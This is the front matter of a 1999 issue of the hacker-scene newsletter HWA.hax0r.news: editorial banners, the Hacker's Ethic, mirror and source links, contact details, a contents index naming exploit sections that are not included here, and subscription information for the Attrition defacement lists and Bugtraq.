[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99/2000=] Number 48 Volume 1 1999 Dec 26th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

(¯`·._(¯`·._(¯`·._(¯`·._( © xmas! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)

                            HWA.hax0r.news

The end is nigh!, cash in your bearer bonds!                    - sAs
I'm waiting for a $100,206,570 credit on my Visa bill!          - Ed
Got plenty of ammo? Did you remember to buy gun oil?            - Ed

(¯`·._(¯`·._(¯`·._(¯`·._( © xmas! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)

OH YA, AND HAPPY NEW YEARS

Coming soon!

(¯`·._(¯`·._(¯`·._(¯`·._( © w00t! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)

Coverage
~~~~~~~~

This is #48 covering Dec 19th to Dec 26th

* Also contains some older material missed from past issues over the
  last few weeks.

==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Mailing list members: 468

Can we bump this up somewhat? Spread the word!

==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...

Hot Hits
~~~~~~~~

.gov and .mil activity

There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news...                                                  - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
                          HWA.hax0r.news
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
                   http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         @
@  The HWA website is sponsored by CUBESOFT communications. I highly      #
#  recommend you consider these people for your web hosting needs.        @
@                                                                         #
#  Web site sponsored by CUBESOFT networks  http://www.csoft.net          @
@  check them out for great fast web hosting!                             #
#                                                                         @
@  http://www.csoft.net/~hwa                                              #
#                                                                         @
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Hacker's Ethic
~~~~~~~~~~~~~~

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment.

One of the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

  1 - Access to computers should be unlimited and total.
  2 - All information should be free.
  3 - Mistrust authority - promote decentralization.
  4 - Hackers should be judged by their hacking, not bogus criteria such
      as degrees, age, race, or position.
  5 - You create art and beauty on a computer.
  6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Formatting
~~~~~~~~~~

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched
since formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've
endeavoured to format all text to 80 cols except for articles and site
statements and urls, which are posted verbatim. I've decided to continue
with this method unless more people complain. The zine is best viewed in
1024x768 mode with UEDIT....                                      - Ed

BTW if anyone can suggest a better editor than UEDIT for this thing send
me some email, i'm finding it lacking in certain areas. Must be able to
produce standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Mirrors
~~~~~~~

New mirror sites

*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
*** http://datatwirl.intranova.net * NEW *
    http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
    http://net-security.org/hwahaxornews
    http://www.sysbreakers.com/hwa
    http://www.attrition.org/hosted/hwa/
    http://www.ducktank.net/hwa/issues.html.
    http://hwazine.cjb.net/
    http://www.hackunlimited.com/files/secu/papers/hwa/
    http://www.attrition.org/~modify/texts/zines/HWA/
*   http://hwa.hax0r.news.8m.com/
*   http://www.fortunecity.com/skyscraper/feature/103/

*   Crappy free sites but they offer 20M & I need the space...
**  Some issues are not located on these sites since they exceed the
    file size limitations imposed by the sites :-( please only use these
    if no other recourse is available.
*** Most likely to be up to date other than the main site.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html.
** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Synopsis
~~~~~~~~

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use out
of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN, nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info. It's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame. Did you ever notice how the
most famous/infamous hackers are the ones that get caught? There's a lot
to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...

**************************************************************************

"If life is a waste of time and time is a waste of life, then let's all
get wasted and have the time of our lives"                       - kf

Efnet
~~~~~

Eris Free Net #HWA.hax0r.news

**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed        ***
***                                                                    ***
*** please join to discuss or impart news on the zine and around the   ***
*** scene or just to hang out, we get some interesting visitors you    ***
*** could be one of em.                                                ***
***                                                                    ***
*** Note that the channel isn't there to entertain you its purpose is  ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips  ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************

=--------------------------------------------------------------------------=

Contents
~~~~~~~~

=--------------------------------------------------------------------------=
                                 [ INDEX ]
=--------------------------------------------------------------------------=
 Key Intros
=--------------------------------------------------------------------------=

 00.0 .. COPYRIGHTS
 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
 00.2 .. SOURCES
 00.3 .. THIS IS WHO WE ARE
 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
 00.5 .. THE HWA_FAQ V1.0

 ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
 loosely translated it means "Just because something is abused, it should
 not be taken away from those who use it properly." This is our new motto.

=--------------------------------------------------------------------------=
 Key Content
=--------------------------------------------------------------------------=

 "The three most dangerous things in the world are a programmer with a
 soldering iron, a hardware type with a program patch and a user with an
 idea."                                                         - Unknown

 01.0 .. GREETS
 01.1 .. Last minute stuff, rumours, newsbytes
 01.2 .. Mailbag
 02.0 .. From the Editor
 03.0 .. Socks proxies, Wingates and more from IRC4ALL
 04.0 .. Cyberarmy Proxies, Accounts and Wingates etc (* If available)
 05.0 .. Belgium: Security of Banksys compromised
 06.0 .. Public access mail servers
 07.0 .. Santa Claus about to lose his domain name for nonpayment?
 08.0 .. Interview with NFO (Nine Forty One Group)
 09.0 .. The History of IRC (Internet Relay Chat)
 10.0 .. Pagoo Internet voice MailBox by Loophole/HHP
 11.0 .. Top 11 Stories of 1999 according to HNN
 12.0 .. AntiVirus scanning and misused tools
 13.0 .. RST Sets the Record Straight
 14.0 .. Russian Politician Threatens Cyber Attack
 15.0 .. PCR-1000 Control Suite Released by Ghetto.org
 16.0 .. Nuclear Power Plant Y2K Readiness
 17.0 .. New E-zines Released
 18.0 .. Digi.no publishes Script Kiddie Rant
 19.0 .. w00w00 Con 1999
 20.0 .. pops.c popmail scanner by duro
 21.0 .. Cypherpunks meeting announcement
 22.0 .. Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5
 23.0 .. [ISN] Hacker Shootouts?
 24.0 .. [ISN] 21 yr old secures $53Mil for high-tech startup
 25.0 .. [ISN] Netscape Security Flaw Revealed
 26.0 .. [ISN] Cyberterrorism hype
 27.0 .. [ISN] The Beijing Hack Attack
 28.0 .. [ISN] Most cybercrime goes unpunished
 29.0 .. [ISN] Jubilant Zhirinovsky wants to hack western computers
 30.0 .. [ISN] Tribe and Trinoo, two new virulent virii
 31.0 .. [ISN] As New Year nears, threat of Net attack program mounts
 32.0 .. [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)
 33.0 .. [ISN] How to report internet related crime
 34.0 .. [ISN] Ten risks of PKI (Public Key Infrastructure)
 35.0 .. [ISN] Forbes says he'll ditch all crypto export controls
 36.0 .. [ISN] Zyklon claims his crime was "no big deal"
 37.0 .. [ISN] Security Wire Digest Volume 1
 38.0 .. mailx.c slackware 3.6 local exploit
 39.0 .. cmsdex.c Solaris (2.6 / 7.0) remote exploit
 40.0 .. xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier
 41.0 .. rpc.autofsd.c FreeBSD/misc remote exploit by guidob
 42.0 .. iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli
 43.0 .. truck.c UnixWare 7.1 local exploit by Brock Tellier

=-------------------------------------------------------------------------------=

 AD.S .. Post your site ads or etc here, if you can offer something in
         return that's tres cool, if not we'll consider ur ad anyways so
         send it in. Ads for other zines are ok too btw just mention us
         in yours, please remember to include links and an email contact.
         Corporate ads will be considered also and if your company wishes
         to donate to or participate in the upcoming Canc0n99 event send
         in your suggestions and ads now... n.b date and time may be
         pushed back, join mailing list for up to date information.
         Current dates: POSTPONED til further notice, place: TBA.

 Ha.Ha .. Humour and puzzles
          Hey You!
          =------=
          Send in humour for this section! I need a laugh and it's hard
          to find good stuff... ;)

 SITE.1 .. Featured site,
 H.W    .. Hacked Websites
 A.0    .. APPENDICES
 A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Legal
~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT
NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR.
                                                                  - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if it's good enough for CNN it's good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contacts
~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada
/ North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings, a subscription to your cool foreign
hacking zine or photos, small non-explosive packages or sensitive
information etc etc well, now you can. (w00t) please no more inflatable
sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal
and send a poor guy a postcard preferably one that has some scenery from
your place of residence for my collection, I collect stamps too so you
kill two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in Bahrain,
take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
  compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ: 58939315 note; not always online, and do not abuse or
use for lame questions!

My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources
~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PLEASE if you have any changes or additions for this section please mail
them to cruciphux@dok.org. Thank you.

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/        Electronic Underground Affiliation
http://ech0.cjb.net               ech0 Security
http://axon.jccc.net/hir/         Hackers Information Report
http://net-security.org           Net Security
http://www.403-security.org       Daily news and security related site
http://www.hack.co.za/            Current exploits archive

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

Submissions
~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. 
;)

-=-

--

defaced summary [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail.

There will be ONE type of post to this list:

1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is for informational purposes only. Subscribing denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel charged with tracking security incidents on government run networks.

This list is for informational purposes only. Subscribing denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

--

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce, via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager.

This list is for informational purposes only. Subscribing denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list (see the info file) started by Scott Chasin. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body "subscribe bugtraq". I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index: http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list's charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list.
Please follow the below guidelines on what kind of information should be posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options, will be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available:

* Incidents' Mailing List.

BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of widespread cases (Melissa, ADM worm, etc). The other choice people are usually left with is to email CERT but this fails to communicate this important information to others that may be potentially affected.

The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits, new trojan horses and viruses, sources of attacks and tell-tale signs of intrusions.

To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com.

On the information resource front you will find a large database of the following:

* Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well as links to reference information such as email messages, advisories and web pages. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products from over two hundred different vendors.

* Services. A large and focused directory of security services offered by vendors.

* Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly from our servers when possible.

* Tools. A large array of free security tools. Categorized and available for download.

* News: A vast number of security news articles going all the way back to 1995.

* Security Resources: A directory to other security resources on the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

